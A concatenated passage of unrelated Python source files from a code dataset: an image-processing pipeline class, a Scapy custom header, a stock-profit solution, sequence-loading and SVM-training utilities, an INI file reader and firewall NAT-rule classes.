self.data.caseBoundary,\\\n self.data.caseScore)\n \n return validResult\n \n\n def _find_pixel_conversion_factor(self):\n boxDetectorPredictionValid = utils.getPixel2CmConversionFactor(self.data)\n\n self.logger.debug(\"_find_pixel_conversion_factor detected the width of the bucket in pixels to be: %s\\n \"\\\n \"pixel2CM_conversion_factor was found to be: %s\\nboxDetectorPredictionValid = %s\\nbucketWidthPointsXCord = %s\\n\\n\",\\\n self.data.pixel2CM_conversion_factor, self.data.bucketWidthPX, boxDetectorPredictionValid, self.data.bucketWidthPointsXCord)\n\n if not boxDetectorPredictionValid:\n self.logger.warning(\"Detected bucket boundary NOT valid.\\n***Algo will early return***\\n\")\n return False\n return True\n\n\n def _find_best_crop_boundary(self):\n utils.getBestBoundaryToCropWith(self.data)\n\n self.logger.debug(\"The best boundary to crop the image with was found to be\\n%s\\n\\n\",\\\n self.data.bestBoundary)\n\n if len(self.data.bestBoundary) != 4:\n self.logger.warning(\"Was unable to find the best boundary to crop the image with\"\\\n \" because NOT ALL of the objects required by config were detected.\\n***Algo will\"\\\n \" early return***\\n\")\n return False\n return True\n\n\n def _crop_input_image(self):\n imageCropSuccess = utils.cropImage(self.data)\n\n if (not imageCropSuccess) or len(self.data.input_image_np_cropped) == 0:\n self.logger.warning(\"Could not find appropriate bounding boxes to crop the image with.\"\\\n \"\\n***Algo will early return***\\n\")\n return False\n\n self.logger.info(\"Was able to successfully crop the image using detected bounding boxes.\\n\")\n if self.data.debugMode:\n self.data.debug_info.append({'description': 'Input image cropped using the best\"\\\n \" detected boundary','image':\\\n visUtils.encodeImageAsBase64(self.data.input_image_np_cropped)})\n return imageCropSuccess\n\n\n def _detect_roi_uncrop_image(self):\n validRoi = self.roiDelineator.inferOnSingleImage(self.data)\n\n imageUncropSuccess = utils.uncropImage(self.data)\n\n if self.data.debugMode:\n self.data.roi_roidDelineatorSize.dtype='uint8'\n self.data.debug_info.append({'description': 'ouput of roiDelineator network in original'\\\n ' (raw) size','image': visUtils.encodeImageAsBase64(cv2.cvtColor(\\\n self.data.roi_roidDelineatorSize*255, cv2.COLOR_GRAY2BGR))})\n\n self.data.roi_actualSize.dtype='uint8'\n self.data.debug_info.append({'description': 'ouput of roiDelineator network resized '\\\n 'to the same scale as input image',\n 'image': visUtils.encodeImageAsBase64(cv2.cvtColor(\\\n self.data.roi_actualSize*255, cv2.COLOR_GRAY2BGR))})\n \n return validRoi and imageUncropSuccess\n\n\n def _calculate_roi_boundary(self):\n \n if not utils.postProcessRoi(self.data):\n self.logger.warning(\"_calculate_roi_boundary returned early because of a failure in\"\\\n \" utils.postProcessRoi\\n\")\n return False\n \n \n if not utils.getRoiContour(self.data):\n self.logger.error(\"_calculate_roi_boundary returned early because of a failure in\"\\\n \" utils.getRoiContour\\n\")\n return False\n \n validBoundaryPoints = utils.getRoiBoundaryPoints(self.data)\n\n if self.data.debugMode:\n self.data.debug_info.append({'description': 'output of roiDelineator, ouput of\"\\\n \" boxDetector, and the approximated roi boundary points all overlayed on the input image',\n 'image': visUtils.visualizeAllResults(\n self.data.input_image_np,\n self.data.roi_actualSize,\n self.data.bestBoundary,\n self.data.bucketScore,\n self.data.matInsideBoundary,\n self.data.matInsideScore,\n self.data.caseBoundary,\n self.data.caseScore,\n self.data.bucketLeftEdge,\n self.data.bucketRightEdge,\n self.data.bucketMidEdge,\n self.data.approximated_roi_boundary)})\n \n return validBoundaryPoints\n\n\n def _validate_returned_dictionary_serializability(self):\n try:\n serializedOutput = json.dumps(self.data.as_dict(self.data.debugMode))\n except:\n self.logger.error(\"_validate_returned_dictionary_serializability thinks the\"\\\n \" returned dictionary is NOT serializable. Just empty results will be returned.\")\n return False\n\n self.logger.debug(\"_validate_returned_dictionary_serializability verified that\"\\\n \" returned dictionary is serializable.\")\n return True\n\n\n def _validate_results(self):\n roiValid = utils.validateApproximatedRoiBoundary(self.data)\n\n bucketBoxValid = utils.validateBucketBox(self.data)\n matInsideBoxValid = utils.validateMatInsideBox(self.data)\n bucketLinesValid = utils.validateBucketLines(self.data)\n\n returnedDictionaryIsSerializable = self._validate_returned_dictionary_serializability()\n\n \n self.logger.debug(\"The approximated (reduced) roi boundary was valid = %s\\n\\n\", roiValid)\n\n self.logger.debug(\"The bucketBox was valid = %s\\n\\n\", bucketBoxValid)\n\n self.logger.debug(\"The matInsideBox was valid = %s\\n\\n\", matInsideBoxValid)\n\n self.logger.debug(\"The bucketLines were valid = %s\\n\\n\", bucketLinesValid)\n\n self.logger.debug(\"returnedDictionaryIsSerializable = %s\\n\\n\", returnedDictionaryIsSerializable)\n\n\n if roiValid and bucketBoxValid and matInsideBoxValid and returnedDictionaryIsSerializable:\n self.data.valid = True\n self.logger.info(\"Successfully calculated and verified final results.\\n\")\n return True\n\n else:\n self.data.clearOutputData()\n self.logger.info(\"Validation of final results failed. We are going to return empty values\"\\\n \" intead of what we calculated because garbage values cause trouble downstream.\")\n return False\n\n\n def _run_algorithm(self, input_image, input_config):\n #Clear all existing fiels (containing previous execution results) except self.data.debugMode\n self.data.initAllData()\n \n if not self._load_configs(input_config) or not self._load_image(input_image):\n self.logger.error(\"_run_algorithm returned early because of bad input image or bad configs \\n\")\n return False\n\n if not self._detect_boundaries():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _detect_boundaries\\n\")\n return False\n\n if not self._find_best_crop_boundary():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _find_best_crop_boundary\\n\")\n return False\n\n if not self._find_pixel_conversion_factor():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _find_pixel_conversion_factor\\n\")\n return False\n\n if not self._crop_input_image():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _crop_input_image\\n\")\n return False\n\n if not self._detect_roi_uncrop_image():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _detect_roi_uncrop_image\\n\")\n return False\n \n if not self._calculate_roi_boundary():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _calculate_roi_boundary\\n\")\n return False\n\n if not self._validate_results():\n self.logger.warning(\"_run_algorithm returned early because of a failure in _validate_results\\n\")\n return False\n\n self.logger.info(\"_run_algorithm returned the following results (excluding the debug info):\\n%s\\n\\n\",\n self.data.as_dict())\n\n return True\n\n\n def execute(self, input_image, input_config):\n achivedFinalResults = self._run_algorithm(input_image, input_config)\n self.logger.info(\"_run_algorithm achieved final results == %s.\\n\", achivedFinalResults)\n\n if not achivedFinalResults:\n self.data.clearOutputData()\n \n return self.data.as_dict(self.data.debugMode)","sub_path":"fmdl_algo/fmdlAlgo/FMDLAlgo.py","file_name":"FMDLAlgo.py","file_ext":"py","file_size_in_byte":17920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"286370539","text":"from scapy.all import *\nimport sys, os\n\nTYPE_CUSTOMDATA = 0x1313\nTYPE_IPV4 = 0x0800\n\nclass CustomData(Packet):\n name = \"CustomData\"\n fields_desc = [\n # 16 bits\n ShortField(\"proto_id\", 0),\n ShortField(\"content_id\", 101),\n # 8 bits\n ByteField(\"ingress_num\", 0),\n ByteField(\"egress_num\", 0),\n ]\n def mysummary(self):\n return self.sprintf(\"proto_id=%proto_id%, content_id=%content_id%, ingress_num=%ingress_num%, egress_num=%egress_num%\")\n\n\nbind_layers(Ether, CustomData, type=TYPE_CUSTOMDATA)\nbind_layers(CustomData, IP, proto_id=TYPE_IPV4)\n","sub_path":"exercises/recirculate/customdata_header.py","file_name":"customdata_header.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"639977211","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n minNow = 1 << 30\n maxProfit = 0\n \n for i in range(len(prices)):\n price = prices[i]\n if price - minNow > maxProfit:\n maxProfit = price - minNow\n if price < minNow:\n minNow = price\n\n return maxProfit\n\n\nif __name__ == '__main__':\n# l = [7, 1, 5, 3, 6, 4]\n l = [7,6,4,3,1]\n print(Solution().maxProfit(l))\n","sub_path":"121.py","file_name":"121.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"333803850","text":"##########################################################################\n### Importing required modules\n##########################################################################\n\nimport os\nimport pickle\nimport time\nimport importlib\n\n# to use this modules, TRAL has to be installed properly\nfrom tral.sequence import sequence\n\n##########################################################################\n### Defining paths and variables\n##########################################################################\n\nworking_directory = \"/home/lina/SynologyDrive/TRAL_Masterthesis/TRAL_Pipeline_Analytics/TRAL_Analytics/working_files\"\nsequences_path = \"/home/lina/SynologyDrive/TRAL_Masterthesis/IBM_files/Assembled_genes\"\n\n## tissues to analyze\ntissues = [\"blood_derived_normal\",\"primary_tumor\",\"solid_tissue_normal\"]\n\n## genes to analyze\n# genes_list = \"/home/lina/SynologyDrive/TRAL_Masterthesis/TRAL_Pipeline_Analytics/Prepare_PASS/colorectal_msi_genes.txt\"\n# with open(genes_list) as g:\n# genes = g.readlines()\n# genes = [x.strip() for x in genes]\n# or define list with only few genes:\n\ngenes = [\"APC\",\"MLH1\"]\n# genes = [\"APC\"]\npatients = [ patient for patient in os.listdir(sequences_path)]\n# patients = [\"Pat1\",\"Pat10\",\"Pat34\"]\n\n##########################################################################\n### Get the sequences from files\n##########################################################################\n\n# sequences_per_gene = sequences_per_gene(genes, sequences_path,show_time=True,as_pickle=True)\n# sequences_per_gene[\"MLH1\"][\"primary_tumor\"][\"Pat29\"]\n# sequences_per_gene[\"APC\"][\"primary_tumor\"][\"Pat29\"]\n\n# pickle_sequences = retrieve_sequences_pickle(working_directory, genes)\n# pickle_sequences[\"APC\"][\"primary_tumor\"][\"Pat34\"]\n# pickle_sequences[\"MLH1\"][\"solid_tissue_normal\"][\"Pat28\"]\n\ndef retrieve_sequences_pickle(working_directory, genes):\n\n \"\"\" returns a dictionary of sequences for each gene in the input list\n sequences_per_gene[gene][tissue][patient] if saved as pickle in working_directory\n\n Args:\n genes (list): defines for which genes the sequences should be taken \"\"\"\n\n sequences_per_gene = {}\n for gene in genes:\n with open(os.path.join(working_directory, \"sequences\", gene + \".pkl\"), 'rb') as handle:\n sequences = pickle.load(handle) \n sequences_per_gene.update({gene:sequences})\n return sequences_per_gene\n\ndef sequences_per_gene(genes, sequences_path, show_time=False, as_pickle=False, patient=True):\n \n \"\"\" TODO: Update documenation here!!! (patient=True)\n \n returns a dictionary of sequences for each gene in the input list\n sequences_per_gene[gene][tissue][patient]\n\n Args:\n genes (list): defines for which genes the sequences should be taken\n sequences_path (string) \n show_time: prints time if true\n as_pickle: save sequences as pickle if true \"\"\"\n\n start = time.time()\n# create one dictionary per gene\n sequences_per_gene = {}\n for gene in genes:\n # gene name gives dictionary of all patients for all tissues\n if patient: # patient data\n sequences = iterate_patients(sequences_path, gene)\n else: # uniprot data\n sequences = get_sequences(sequences_path, gene)\n if as_pickle:\n save_path = os.path.join(working_directory, \"sequences\", gene + \".pkl\")\n try:\n with open(save_path, \"wb\") as handle:\n pickle.dump(sequences, handle)\n except (IOError, OSError) as e:\n print(\"Was not able to create a pickle from the sequences.\\n Error:{}\".format(e))\n sequences_per_gene.update({gene:sequences})\n \n end = time.time() \n if show_time:\n print(\"It took {} seconds to get the sequences.\".format(end - start))\n \n return(sequences_per_gene)\n\n\ndef iterate_patients(sequences_path, gene):\n\n \"\"\" returns a dictionary of sequences the gene in the input list\n sequences[tissue][patient]\n\n Args:\n gene (string)\n sequences_path (string) \"\"\"\n\n \n\n # initialize dictionary for tissues\n sequences = {tissue: {patient: None for patient in patients} for tissue in tissues}\n\n for patient in patients:\n for tissue in tissues:\n tissue_path = os.path.join(sequences_path, patient, tissue)\n try:\n sequences[tissue][patient] = get_sequences(tissue_path, gene)\n print(\"Got sequences from tissue {} and patient {}\".format(tissue, patient))\n except:\n print(\"Unexpected Error while trying to call get_sequences({}, {}) .\".format(tissue_path, gene))\n exit\n \n return sequences\n\n\ndef get_sequences(data_path, gene):\n\n \"\"\" returns TRAL sequences from a fasta-file (name .fasta)\n\n Args:\n gene (string)\n data_path (string) \"\"\"\n \n sequence_file = os.path.join(data_path, gene + \".fasta\")\n try:\n sequences_gene = sequence.Sequence.create(file = sequence_file, input_format = 'fasta')\n except FileNotFoundError:\n print(\"Did not found {} in {}.\".format(gene,data_path))\n sequences_gene = \"Did not found {} in {}.\".format(gene,data_path)\n except:\n print(\"Unexpected Error while trying to get the sequence from {}.\".format(sequence_file))\n sequences_gene = \"Unexpected Error while trying to get the sequence from {}.\".format(sequence_file)\n # print(\"sequences_gene\", sequences_gene)\n return sequences_gene","sub_path":"TRAL_Analytics/get_sequences.py","file_name":"get_sequences.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"477203920","text":"def train(name, class_weight=None, c=1.0, data='data/model_data.csv', training_only=True, drop=[]):\n data = pandas.read_csv(data)\n #data = data.head(datapoints)\n\n train = data.loc[((data.frameID >= TRAIN_MIN) & (data.frameID <= TRAIN_MAX))]\n val = data.loc[((data.frameID >= VAL_MIN) & (data.frameID <= VAL_MAX))]\n test = data.loc[((data.frameID >= TEST_MIN) & (data.frameID <= TEST_MAX))]\n\n if training_only:\n X_train = train.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n y_train = train['group_label']\n\n X_val = val.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n y_val = val['group_label']\n\n X_test = test.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n y_test = test['group_label']\n else:\n t = data.loc[((data.frameID >= TRAIN_MIN) & (data.frameID <= VAL_MAX))]\n X_train = t.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n y_train = t['group_label']\n\n X_val = val.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n y_val = val['group_label']\n\n X_test = test.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n y_test = test['group_label']\n \n logging.info(\"Starting to train SVM\")\n m = svm.LinearSVC(class_weight=class_weight, C=c)\n clf = CalibratedClassifierCV(m)\n clf.fit(X_train, y_train)\n\n logging.info(\"=======\" + name + \"=======\")\n logging.info(\"Testing on val set\")\n y_pred = clf.predict(X_val)\n logging.info(confusion_matrix(y_val,y_pred))\n logging.info(classification_report(y_val,y_pred))\n\n logging.info(\"Testing on test set\")\n y_pred = clf.predict(X_test)\n logging.info(confusion_matrix(y_test,y_pred))\n logging.info(classification_report(y_test,y_pred))\n\n logging.info(\"writing to outfile\")\n outfile = \"data/social_relations_\" +str(name)+ \".model\"\n pickle.dump(clf, open(outfile, \"wb\"))\n logging.info(\"finished\\n\")","sub_path":"detect_groups_simple.py","file_name":"detect_groups_simple.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511492626","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n#\n# Scope: ............\n# by Loreto Notarantonio 2013, February\n# ######################################################################################\nimport sys\nimport os\n\nimport collections\nimport configparser\nimport codecs\n\nfrom ..LnCommon.LnLogger import SetLogger\nfrom ..LnCommon.LnColor import LnColor\n\n# ######################################################\n# # https://docs.python.org/3/library/configparser.html\n# ######################################################\ndef ReadIniFile(fileName, RAW=False, returnOrderedDict=False, extraSections=[], exitOnError=False, STRICT=True, subSectionChar=None):\n logger = SetLogger(package=__name__)\n\n # Setting del parser\n configMain = configparser.ConfigParser( allow_no_value=False,\n delimiters=('=', ':'),\n comment_prefixes=('#',';'),\n inline_comment_prefixes=(';',),\n strict=STRICT, # True: impone unique key/session\n # strict=False,\n empty_lines_in_values=True,\n default_section='DEFAULT',\n interpolation=configparser.ExtendedInterpolation()\n )\n configMain.optionxform = str # mantiene il case nei nomi delle section e delle Keys (Assicurarsi che i riferimenti a vars interne siano case-sensitive)\n\n try:\n data = codecs.open(fileName, \"r\", \"utf8\")\n configMain.readfp(data)\n\n except (Exception) as why:\n print(\"Errore nella lettura del file: {FILE} - {WHY}\".format(FILE=fileName, WHY=str(why)))\n sys.exit(-1)\n\n\n\n # ------------------------------------------------------------------\n # - per tutte le sezioni che sono extra facciamo il merge.\n # - Se Key-Val esistono esse sono rimpiazzate\n # ------------------------------------------------------------------\n for sectionName in extraSections:\n logger.info('adding Section: {SECTION}'.format(SECTION=sectionName))\n logger.info(' data: {EXTRA}'.format(EXTRA=extraSections[sectionName]))\n extraSection = extraSections[sectionName]\n\n if not configMain.has_section(sectionName):\n logger.debug('creating Section: {0}'.format(sectionName))\n configMain.add_section(sectionName)\n\n for key, val in extraSection.items():\n logger.debug('adding on Section {0}:'.format(sectionName))\n logger.debug(' key: {0}'.format(key))\n logger.debug(' val: {0}'.format(val))\n configMain.set(sectionName, key, val)\n\n\n\n\n\n\n\n # Parsing del file\n if type(configMain) in [configparser.ConfigParser]:\n configDict = iniConfigAsDict(configMain, returnOrderedDict=returnOrderedDict, raw=RAW, subSectionChar=subSectionChar)\n else:\n configDict = configMain\n\n return configMain, configDict\n\n\n############################################################\n# subSectionChar: carattere da individuare nel nome della section per\n# interpretare la stessa come section+subsection\n############################################################\ndef iniConfigAsDict(INIConfig, sectionName=None, returnOrderedDict=False, raw=False, subSectionChar=None):\n \"\"\"\n Converts a ConfigParser object into a dictionary.\n\n The resulting dictionary has sections as keys which point to a dict of the\n sections options as key => value pairs.\n \"\"\"\n\n the_dict = collections.OrderedDict({}) if returnOrderedDict else {}\n fDEBUG = False\n try:\n for section in INIConfig.sections():\n # -----------------------------------------------------------------------\n # - questo blocco serve per splittare eventauli section in cui il nome\n # - contiene dei '.' ed interpretarli come subSections\n # -----------------------------------------------------------------------\n if subSectionChar:\n subSection = section.split(subSectionChar)\n else:\n subSection = [section] # una sola section\n\n # if len(subSection) > 1:\n # print (subSection)\n currSECT = the_dict # top\n for sect in subSection:\n # print (sect)\n if not sect in currSECT:\n currSECT[sect] = collections.OrderedDict({}) if returnOrderedDict else {}\n currSECT = currSECT[sect] # aggiorna pointer\n\n\n # else: # lavoriamo solo ad un livello di section.\n # the_dict[section] = collections.OrderedDict({}) if returnOrderedDict else {}\n # currSECT = the_dict[section]\n\n if fDEBUG: print ()\n if fDEBUG: print ('[{SECT}]'.format(SECT=section))\n for key, val in INIConfig.items(section, raw=raw):\n currSECT[key] = val\n if fDEBUG: print (' {KEY:<30} : {VAL}'.format(KEY=key, VAL=val))\n\n except (configparser.InterpolationMissingOptionError) as why:\n print(\"\\n\"*2)\n print(\"=\"*60)\n print(\"ERRORE nella validazione del file\")\n print(\"-\"*60)\n print(str(why))\n print(\"=\"*60)\n sys.exit(-2)\n\n if sectionName:\n return the_dict[sectionName]\n else:\n return the_dict\n\n\n############################################################\n#\n############################################################\ndef iniConfigAsDict_OneLEVEL(INIConfig, sectionName=None, returnOrderedDict=False, raw=False):\n \"\"\"\n Converts a ConfigParser object into a dictionary.\n\n The resulting dictionary has sections as keys which point to a dict of the\n sections options as key => value pairs.\n \"\"\"\n\n the_dict = collections.OrderedDict({}) if returnOrderedDict else {}\n fDEBUG = False\n try:\n for section in INIConfig.sections():\n # the_dict[section] = myDict\n the_dict[section] = collections.OrderedDict({}) if returnOrderedDict else {}\n if fDEBUG: print ()\n if fDEBUG: print ('[{SECT}]'.format(SECT=section))\n for key, val in INIConfig.items(section, raw=raw):\n the_dict[section][key] = val\n if fDEBUG: print (' {KEY:<30} : {VAL}'.format(KEY=key, VAL=val))\n\n except (configparser.InterpolationMissingOptionError) as why:\n print(\"\\n\"*2)\n print(\"=\"*60)\n print(\"ERRORE nella validazione del file\")\n print(\"-\"*60)\n print(str(why))\n print(\"=\"*60)\n sys.exit(-2)\n\n if sectionName:\n return the_dict[sectionName]\n else:\n return the_dict\n\n\n\n\n############################################################\n#\n############################################################\ndef printINIconfigparser(INI_raw):\n for section in INI_raw.sections():\n print ()\n print ('[{SECTION}]'.format(SECTION=section))\n for key, val in INI_raw.items(section):\n TAB = 37*' '\n print (' {KEY:<30} : {VAL}'.format(KEY=key, VAL=val.replace ('\\n', '\\n' + TAB)))\n\n\n\n############################################################\n#\n############################################################\ndef printINIdict(INI_dict):\n for sectName in INI_dict.keys():\n print ()\n print ('[{SECTION}]'.format(SECTION=sectName))\n # for key, val in INI_dict[sectName].items(sectName):\n TAB = 37*' '\n for key, val in INI_dict[sectName].items():\n print (' {KEY:<30} : {VAL}'.format(KEY=key, VAL=val.replace ('\\n', '\\n' + TAB)))\n\n\nif __name__ == '__main__':\n print ('sono qui')\n iniFile = 'ReadIniFile.test.ini'\n with open(iniFile, \"r\") as f:\n data = f.read()\n print (data)\n\n Raw, Dict = readIniFile(iniFile, RAW=True, returnOrderedDict=True, exitOnError=True, STRICT=False)\n # printINIconfigparser (Raw)\n printINIdict (Dict)\n sys.exit()\n","sub_path":"File/appo/ReadIniFile.py","file_name":"ReadIniFile.py","file_ext":"py","file_size_in_byte":8146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"639321151","text":"def _reverse(c): \n od = ord(c)\n if(65<=od and od<=90):\n od = 90 - (od-65)\n return chr(od)\n elif(97<=od and od<=122):\n od = 122 - (od - 97)\n return chr(od)\n else:\n return c\n#print(_reverse('a'))\nwhile True:\n temp = \"\"\n inp = input()\n if(inp == \"!\"):\n break\n else:\n for i in inp:\n temp = temp + _reverse(i)\n print(temp)","sub_path":"Code/CodeRecords/2977/52592/319706.py","file_name":"319706.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"49964457","text":"from smc.policy.rule import Rule, RuleCommon\nfrom smc.base.model import Element, SubElement, SubElementCreator\nfrom smc.policy.rule_elements import LogOptions, Destination\nfrom smc.api.exceptions import ElementNotFound, InvalidRuleValue,\\\n CreateRuleFailed\nfrom smc.base.util import element_resolver\nfrom smc.base.structs import NestedDict\n\n\nclass NATRule(Rule):\n @property\n def used_on(self):\n \"\"\"\n Used on specific whether this NAT rule has a specific engine that\n this rule applies to. Default is ANY (unspecified).\n\n :param str,Element value: :py:class:`smc.elements.network` element to\n apply to this NAT rule, or str href\n :return: Element value: name of element this NAT rule is applied on\n \"\"\"\n if 'used_on' in self.data:\n return Element.from_href(self.data.get('used_on'))\n\n @used_on.setter\n def used_on(self, value):\n try:\n self.data['used_on'] = element_resolver(value)\n except ElementNotFound:\n pass\n\n @property\n def action(self):\n pass\n\n @property\n def authentication_options(self):\n pass\n\n @property\n def dynamic_src_nat(self):\n \"\"\"\n Dynamic Source NAT configuration for this NAT rule.\n\n :return: :py:class:`~DynamicSourceNAT`: dynamic source nat object\n \"\"\"\n return DynamicSourceNAT(self)\n\n @property\n def static_src_nat(self):\n \"\"\"\n Static Source NAT configuraiton for this NAT rule.\n\n :return: :py:class:`~StaticSourceNAT`: static source nat object\n \"\"\"\n return StaticSourceNAT(self)\n\n @property\n def static_dst_nat(self):\n \"\"\"\n Static Destination NAT configuration for this NAT rule\n\n :return: :py:class:`~StaticDestNAT`: static dest nat object\n \"\"\"\n return StaticDestNAT(self)\n\n\nclass NATElement(NestedDict):\n \"\"\"\n Common structure for source and destination NAT\n configurations.\n \"\"\"\n def __init__(self, rule):\n options = rule.data.get('options')\n super(NATElement, self).__init__(data=options)\n \n @property\n def has_nat(self):\n \"\"\"\n Is NAT already enabled (assuming modification) or newly\n created.\n\n :return: boolean\n \"\"\"\n return self.typeof in self\n \n @property\n def automatic_proxy(self):\n \"\"\"\n Is proxy arp enabled. Leaving this in the on state is recommended.\n\n :param bool value: enable/disable proxy arp\n :rtype: bool\n \"\"\"\n return self.get(self.typeof, {}).get(\n 'automatic_proxy')\n\n @automatic_proxy.setter\n def automatic_proxy(self, value):\n self.setdefault(self.typeof, {}).update(\n automatic_proxy=value)\n \n @property\n def original_value(self):\n \"\"\"\n Original value is the elements location. Setting this can\n be done by providing an element from :py:class:`smc.elements.network`\n or the direct href. For source NAT, this will be the NAT source element,\n and for dynamic dst NAT, this will be the destination element.\n\n :param str value: element or href from source or destination field\n :return: str original_value: element location \n \"\"\"\n values = self.get(self.typeof, {}).get('original_value')\n if values:\n if 'ip_descriptor' in values:\n return values['ip_descriptor']\n elif 'element' in values:\n return values['element']\n \n @original_value.setter\n def original_value(self, value):\n src = element_resolver(value, do_raise=False)\n if src and src.startswith('http'):\n self.setdefault(self.typeof, {'original_value': {}}).update(\n original_value={'element':src})\n \n @property\n def translated_value(self):\n \"\"\"\n Translated value is the NAT value based on the type of\n NAT. For source NAT and destination NAT this can be either\n an IP address or an element from :py:class:`smc.elements.network`.\n\n :param str value: string ip address or Element (or element href)\n :return: str value: translated value, give preference to IP address if\n ip address and element are both defined.\n \"\"\"\n values = self.get(self.typeof, {}).get(\n 'translated_value', {})\n if values:\n if 'ip_descriptor' in values:\n return values['ip_descriptor']\n elif 'element' in values:\n return values['element']\n\n @translated_value.setter\n def translated_value(self, value):\n try:\n src = {'element': value.href}\n except AttributeError:\n src = {'ip_descriptor': value}\n \n p = self.setdefault(self.typeof, {})\n p.setdefault('translated_value', {}).update(src)\n \n\nclass DynamicSourceNAT(NATElement):\n typeof = 'dynamic_src_nat'\n \n @property\n def original_value(self):\n pass\n \n @property\n def translated_value(self):\n \"\"\"\n The translated value for source NAT is the IP address (or element)\n which will be the translated address for the source. Typically referred\n to as the outbound NAT address.\n\n When setting a new translated address, input should be a string type\n specifying either the IP address to translate to, or can be a valid\n network element from :py:class:`smc.elements.network`. If translated\n ports are not specified, source NAT will the original ports defined or\n if this is a new object will use a dynamic port range of 1024-65535. \n\n :param str value: ipaddress or :py:class:`smc.elements.network` object\n :return: str translated address or name\n \"\"\"\n for value in self.get(self.typeof, {}).get(\n 'translation_values', []):\n if 'ip_descriptor' in value:\n return value['ip_descriptor']\n elif 'element' in value:\n return value['element']\n \n @translated_value.setter\n def translated_value(self, value):\n try:\n src = {'element': value.href}\n except AttributeError:\n src = {'ip_descriptor': value}\n \n values = self.setdefault(self.typeof, {'translation_values': []})\n if values.get('translation_values'):\n values['translation_values'][0].update(src)\n else:\n values['translation_values'].append(src)\n \n @property\n def translated_ports(self):\n \"\"\"\n Translated ports allows custom configuration for PAT on the \n source NAT configuration.\n\n :param tuple min_port,max_port: starting and ending port for source NAT (PAT)\n :return tuple value: min and max ports defined\n \"\"\"\n values = self.get(self.typeof, {}).get(\n 'translation_values', [])\n if values and 'min_port' in values[0]:\n return (values[0].get('min_port'),\n values[0].get('max_port'))\n \n @translated_ports.setter\n def translated_ports(self, value):\n if not isinstance(value, tuple) or len(value) != 2:\n raise ValueError(\"Input must be tuple and length 2\")\n min_port, max_port = value\n ports = {'min_port': min_port,\n 'max_port': max_port}\n \n values = self.setdefault(self.typeof, {'translation_values': []})\n if values.get('translation_values'):\n values['translation_values'][0].update(ports)\n else:\n values['translation_values'].append(ports)\n\n\nclass StaticSourceNAT(NATElement):\n \"\"\"\n Source NAT defines the available options for configuration. This is\n typically used for outbound traffic where you need to hide the original\n source address.\n\n Example of changing existing source NAT rule to use a different source\n NAT address::\n\n for rule in policy.fw_ipv4_nat_rules.all():\n if rule.name == 'sourcenat':\n rule.static_src_nat.translated_value = '10.10.50.50'\n rule.save()\n\n \"\"\"\n typeof = 'static_src_nat'\n\n\nclass StaticDestNAT(NATElement):\n \"\"\"\n Destination NAT provides the ability to translate the destination address\n to a specified location. The NAT rules destination field will be the\n match and the static destination nat address defines how the request is\n rewritten.\n\n Example of changing an existing NAT rule to use a different NAT destination\n and map port 80 to 8080::\n\n for rule in policy.fw_ipv4_nat_rules:\n if rule.name == 'destnat':\n rule.static_dst_nat.translated_value = '30.30.30.30'\n rule.static_dst_nat.translated_ports = (80, 8080)\n rule.save()\n\n \"\"\"\n typeof = 'static_dst_nat'\n\n @property\n def translated_ports(self):\n \"\"\"\n Translated ports for destination NAT can be either single source\n to single destination port, or ranges of ports to translate.\n The format for single ports is: (source_port, destination_port),\n or (80, 443) - translate source port 80 to 443 (single ports can\n also be in string format, i.e. ('80', '443').\n You can also use a range format although port range sizes much\n then match in size. The format for range of ports is:\n ('80-100', '6000-6020') - port 80 translates to 6000, etc.\n\n :param tuple value: (source_port/s, destination_port/s)\n :raises ValueError: Invalid tuple format for port definition\n :return tuple value: ports used for destination PAT\n \"\"\"\n orig_value = self.get(self.typeof, {}).get('original_value')\n tran_value = self.get(self.typeof, {}).get('translated_value')\n \n if not orig_value or not tran_value:\n return None\n \n sport = extract_ports(orig_value)\n dport = extract_ports(tran_value)\n return ('-'.join(sport), '-'.join(dport))\n\n @translated_ports.setter\n def translated_ports(self, value):\n if not isinstance(value, tuple) or len(value) != 2:\n raise ValueError(\"Input must be tuple and length 2\")\n \n sport, dport = map(str, value)\n \n p = self.setdefault(self.typeof, {})\n p.setdefault('original_value', {}).update(add_ports(sport))\n p.setdefault('translated_value', {}).update(add_ports(dport))\n \n\ndef extract_ports(value_dict):\n \"\"\"\n Extract min/max ports from NAT config\n \"\"\"\n seen = []\n keys = ('min_port', 'max_port')\n for key in keys:\n if value_dict.get(key) not in seen:\n seen.append(value_dict[key])\n return map(str, seen)\n\n\ndef add_ports(value_str):\n \"\"\" \n Add min/max ports to NAT config\n \"\"\"\n if '-' in value_str:\n port_min, port_max = value_str.split('-')\n return {'min_port': port_min,\n 'max_port': port_max}\n \n else:\n return {'min_port': value_str,\n 'max_port': value_str}\n\n \n \nclass IPv4NATRule(RuleCommon, NATRule, SubElement):\n \"\"\"\n Create NAT Rules for relevant policy types. Rule requirements are \n similar to a normal rule with exception of the NAT field and no action\n field. \n\n Like policy rules, specifying 